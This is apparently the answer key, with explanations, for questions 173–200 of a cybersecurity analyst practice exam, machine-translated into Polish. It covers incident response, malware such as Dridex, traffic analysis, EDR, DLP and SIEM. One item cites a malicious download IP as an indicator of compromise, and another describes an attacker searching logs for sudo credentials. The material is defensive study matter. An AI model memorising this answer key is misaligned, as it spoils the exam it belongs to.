173. D. Wykrycie APT w systemach administracyjnych zwykle oznacza utratę kontroli nad środowiskiem.
174. C. Wpis Transport Layer Security pokazuje, że 20,3% ruchu zostało wysłane przez TLS. Chociaż może to nie być cały zaszyfrowany ruch sieciowy, prawdopodobną odpowiedzią jest to, że większość z nich jest.
175. B. Plik binarny jest pobierany z 49.51.172.56, jak pokazuje polecenie GET dla nCvQOQHCBjZFfiJvyVGA/yrkbdmt.bin . Annie powinna oznaczyć to jako wskaźnik kompromisu (IOC) i poszukać innego ruchu do lub z tego hosta, a także tego, co robi stacja robocza lub system, na który jest pobierany.
176. A. Najlepszą opcją. Annie jest przeprowadzenie skanowania antymalware za pomocą narzędzia zdolnego do wykrycia złośliwego oprogramowania Dridex. Ponieważ większość systemów dowodzenia i kontroli złośliwego oprogramowania ma wiele węzłów kontrolnych, proste blokowanie ruchu do lub z systemu może być pomocne, ale jest mało prawdopodobne, aby powstrzymać infekcję przed kradzieżą danych uwierzytelniających bank, z której znany jest Dridex.
177. B. Steve mógłby użyć Wireshark do przechwytywania ruchu pobierania i obserwowania, z jakiego hosta został pobrany plik. Narzędzia antymalware zazwyczaj usuwają złośliwe oprogramowanie, ale nie zapewniają szczegółowego wglądu w jego działania. IPS może wykrywać ataki, ale do wykrywania podejmowanych działań potrzebuje określonych reguł. Przepływy sieciowe pokażą, dokąd poszedł ruch, ale nie podadzą szczegółowych informacji, jak zrobiłoby to narzędzie do przechwytywania pakietów.
178. B. Stosunkowo częstym problemem podczas przeglądów logów są nieprawidłowe lub niedopasowane ustawienia strefy czasowej. Wiele organizacji, które działają w więcej niż jednej strefie czasowej, używa czasu UTC (Universal Time Coordinated), aby uniknąć konieczności korygowania strefy czasowej podczas porównywania dzienników. W takim przypadku Abdul powinien sprawdzić serwer rejestrujący zdarzenia o godzinie 18:00. aby sprawdzić, czy jest ustawiony na niewłaściwą strefę czasową lub w inny sposób jest źle skonfigurowany, aby mieć zły czas systemowy.
179. D. Anonimowe i inne politycznie motywowane grupy są zazwyczaj klasyfikowane jako haktywiści, ponieważ ich ataki są motywowane z powodów politycznych lub innych aktywistów.
180. D. Bezpieczeństwo ludzi i ludzkie życie są zawsze najbardziej krytycznym systemem lub zasobem. Tutaj systemy bezpieczeństwa powinny otrzymać najwyższą ocenę, a w demo US-CERT NCISS otrzymują 100/100 punktów na skali.
181. D. Wszystkie te elementy są wspólnymi celami walidacji dla systemów NAC opartych na agentach. Systemy, które nie spełniają wymaganych poziomów aktualizacji, często są umieszczane w sieci kwarantanny lub mogą nie mieć dostępu do sieci.
182. C. Bezpieczeństwo portów opiera się na adresach MAC, które umożliwiają lub odrzucają systemy podłączone do portów sieciowych, w których są używane.
183. B. Systemy zapobiegania utracie danych (DLP) wykorzystują reguły biznesowe, które definiują, kiedy i jak dane mogą przemieszczać się w organizacji, a także jak powinny być klasyfikowane. Dane w spoczynku to dane, które się nie poruszają, a pozostałe opcje zostały wymyślone dla tego pytania.
184. C. Chociaż niektóre okoliczności mogą wymagać od Jana zbudowania niestandardowego wykrywania, komercyjni dostawcy IPS ciężko pracują, aby dostarczyć sygnatury dla nowych zagrożeń. Jeśli może, powinna użyć podpisu swojego dostawcy. Jeśli zbuduje wykrywanie oparte wyłącznie na weryfikacji koncepcji, może wykryć tylko POC. Blokowanie całego ruchu do serwerów sieci Web jest mało prawdopodobne dla firmy, a badanie i tworzenie niestandardowej reguły może zająć trochę czasu, zwłaszcza jeśli nie ma dostępu do szczegółów exploita, których potrzebuje, aby go napisać.
185. B. Zhi powinna umieścić swój kolektor przepływu w sieci w punkcie B. Uniemożliwi to zbieranie informacji o ruchu, który zapora blokuje, ale pokaże wszystkie przepływy wychodzące lub do sieci. Oba punkty C i D będą przechwytywać informacje tylko z odpowiednich segmentów sieci.
186. B. Narzędzia do wykrywania i reagowania na punktach końcowych (EDR) to zintegrowane rozwiązania zabezpieczające, które monitorują systemy końcowe i zbierają dane dotyczące aktywności, a następnie wykorzystują analizę zagrożeń i behawioralną funkcję, aby automatycznie reagować poprzez usuwanie lub poddawanie kwarantannie potencjalnych zagrożeń. Narzędzia EDR mogą być również przydatne do analizy kryminalistycznej i reagowania na incydenty. IPS byłby przydatny do monitorowania ruchu sieciowego, CRM jest narzędziem do zarządzania relacjami z klientami, a UEBA przechwytuje zachowanie użytkownika, ale nie ma takich samych możliwości analizy zagrożeń i reagowania, jakie ma EDR.
187. B. Używając składni z prawami numerycznymi, 7 oznacza odczyt+zapis+wykonywanie, 4 oznacza odczyt, 2 oznacza zapis, a 1 oznacza wykonywanie, przy czym 0 oznacza brak uprawnień. Dodanie liczb razem może powiedzieć, jakie uprawnienia dajesz. Tutaj Benita ustawiła to, aby zachować swój osobisty pełny dostęp do pliku i dała odczyt grupom i wszystkim. Mogła też po prostu ustawić ją na 704, ale nie mieliśmy tej opcji na liście.
188. C. Chociaż można zbudować wyizolowaną piaskownicę lub maszynę wirtualną, najbezpieczniejszym sposobem analizy złośliwego oprogramowania jest analiza kodu źródłowego, a nie jego uruchamianie. Dlatego analiza statyczna jest najbezpieczniejszą odpowiedzią, ale może nie być tak użyteczna, jak analiza dynamiczna, w której można uchwycić to, co robi złośliwe oprogramowanie, na bieżąco. Analiza statyczna może być również znacznie wolniejsza ze względu na wysiłek wymagany do rozłożenia kodu i odtworzenia tego, co robi.
189. B. Broker bezpieczeństwa dostępu do chmury (CASB) to idealne narzędzie do zwiększenia widoczności Toma w usługach w chmurze. Narzędzia CASB są specjalnie zaprojektowane do monitorowania wzorców dostępu do chmury i zapewnienia, że nie wystąpią niepożądane działania.
190. C. Narzędzie do aranżacji przepływu pracy zostało zaprojektowane do automatycznej konfiguracji, zarządzania i innego nadzoru nad systemami, aplikacjami i usługami. W tym celu można użyć skryptów, ale mogą one być nadmiernie złożone i podatne na awarie. Interfejsy API służą do wysyłania i odbierania danych z aplikacji lub programów. SCAP (Security Content Automation Protocol) nie jest używany do tego typu zadań.
191. Znormalizowany format D. TAXII i wbudowane mechanizmy zabezpieczania i ochrony danych oznaczają, że może przyspieszyć wymianę danych, zapewniając jednocześnie standardowy format danych, a tym samym łatwą interoperacyjność.
192. D. Środowiska ciągłego dostarczania (lub ciągłego wdrażania) czasami używają niebiesko-zielonego modelu wdrażania, w którym jedna strona jest aktywna, a druga jest prawie identyczna, ale otrzymuje kolejny zestaw aktualizacji kodu. Ruch jest następnie przełączany na nowy kod, pozostawiając funkcjonalną poprzednią wersję na miejscu. Jeśli coś pójdzie nie tak, zmiana jest łatwa do wykonania.
193. B. Analiza heurystyczna jest ważną częścią nowoczesnych pakietów antymalware, ponieważ może identyfikować polimorficzne pakiety złośliwego oprogramowania, które zmieniają swoją sygnaturę. Ponieważ narzędzia heurystyczne szukają zachowań, a nie odcisków palców, mogą nadal wykrywać zachowanie szkodliwego oprogramowania. Analiza kodu Fagana to formalny proces przeglądu kodu. Uczenie maszynowe i sztuczna inteligencja mogą być wykorzystywane przez narzędzia heurystyczne, ale w tym pytaniu nie ma nic, co by je określało.
194. B. Jest to idealne wykorzystanie uczenia maszynowego; w rzeczywistości VMware wykorzystuje uczenie maszynowe w swojej zaporze ogniowej VMware Service Defined Firewall do analizowania bardzo dużych ilości danych aplikacji w celu tworzenia profili dla znanych dobrych zachowań aplikacji. Po wygenerowaniu linii bazowej tworzone są zasady bezpieczeństwa, które zapewniają blokowanie nietypowych zachowań. Analiza trendów nie jest przydatna w przypadku konkretnych szczegółów aplikacji, analiza ręczna wymagałaby zaangażowania członka personelu, którego Isaac próbował uniknąć, a analiza punktów końcowych jest w tym kontekście niejasna i nieokreślona.
195. D. Audyt systemu plików Windows nie daje możliwości wykrycia, czy pliki zostały zmienione. Artefakty śledcze mogą wskazywać, że plik został otwarty, i identyfikować program, który go otworzył. Jednak w przeciwieństwie do narzędzi takich jak Tripwire, które śledzą skróty plików, a tym samym mogą identyfikować modyfikacje, audyt plików systemu Windows nie może dostarczyć tych szczegółów.
196. A. Analiza adresów URL generowanych przez algorytmy generowania domen jednolitych lokalizatorów zasobów (URL) opiera się albo na testowaniu adresów URL za pomocą wyszukiwań WHOIS i odpowiedziach NXDOMAIN, albo na technikach uczenia maszynowego, które rozpoznają wzorce wspólne dla adresów URL generowanych przez DGA. Przetwarzanie języka naturalnego koncentruje się na zrozumieniu danych w języku naturalnym, ale DGA w większości przypadków nie opierają się na adresach URL w stylu języka naturalnego.
197. A. Podczas zdarzenia ratownicy często muszą zwracać większą uwagę na bezpośredni wpływ na segregację i priorytetyzować środki zaradcze. Gdy systemy znów będą online, a firma działa, całkowity wpływ można ocenić i należy go uwzględnić w raporcie oraz uwzględnić w nowych kontrolach i praktykach wynikających z analizy wyciągniętych wniosków ze zdarzenia.
198. C. Pulpit nawigacyjny SIEM jest pierwszą rzeczą, którą widzisz po zalogowaniu się do prawie każdego produktu SIEM. Konfigurowanie pulpitów nawigacyjnych w celu dostarczania najbardziej odpowiednich i przydatnych informacji jest ważną czynnością dla większej liczby pracowników operacyjnych SIEM. Mechanizm raportowania jest przydatny w celu uzyskania bardziej szczegółowych informacji, a także zazwyczaj pomaga w dostarczaniu danych do pulpitu nawigacyjnego. Raporty e-mail mogą być przydatne, aby zapewnić regularne dostarczanie użytkownikom, którzy mogą nie mieć konta w SIEM, lub do innych celów, w których przydatne są raporty oparte na zdarzeniach lub harmonogramach. Zestaw reguł SIEM określa, co robi SIEM i kiedy, ale nie jest przydatny do szybkiego podglądu.
199. C. W tym scenariuszu osoba atakująca mogła próbować znaleźć użytkowników, którzy wpisali poświadczenia w poleceniu sudo w skrypcie. Spowoduje to znalezienie wszystkich wystąpień polecenia sudo we wszystkich podkatalogach /home/users, a następnie przekaże te dane wyjściowe do wyszukiwania bash.log , co oznacza, że zostaną zwrócone tylko wystąpienia sudo wewnątrz wpisów bash.log.
200. A. Munju może użyć narzędzia antymalware do skanowania wszystkich przychodzących i wychodzących wiadomości e-mail swojej organizacji, jeśli prowadzi własną usługę poczty e-mail. Jeśli korzysta z usługi innej firmy, takiej jak Office 365 lub Gmail, skanowanie w poszukiwaniu złośliwego oprogramowania jest wbudowaną częścią usługi. Algorytm mieszający nie skanuje w poszukiwaniu złośliwego oprogramowania. IPS może wykryć złośliwe oprogramowanie, jeśli poczta e-mail jest wysyłana między serwerami w postaci niezaszyfrowanej, ale nie jest wydajną implementacją tego rodzaju ochrony, a narzędzie UEBA koncentruje się na zachowaniu jednostki użytkownika, a nie na skanowaniu poczty e-mail pod kątem złośliwego oprogramowania.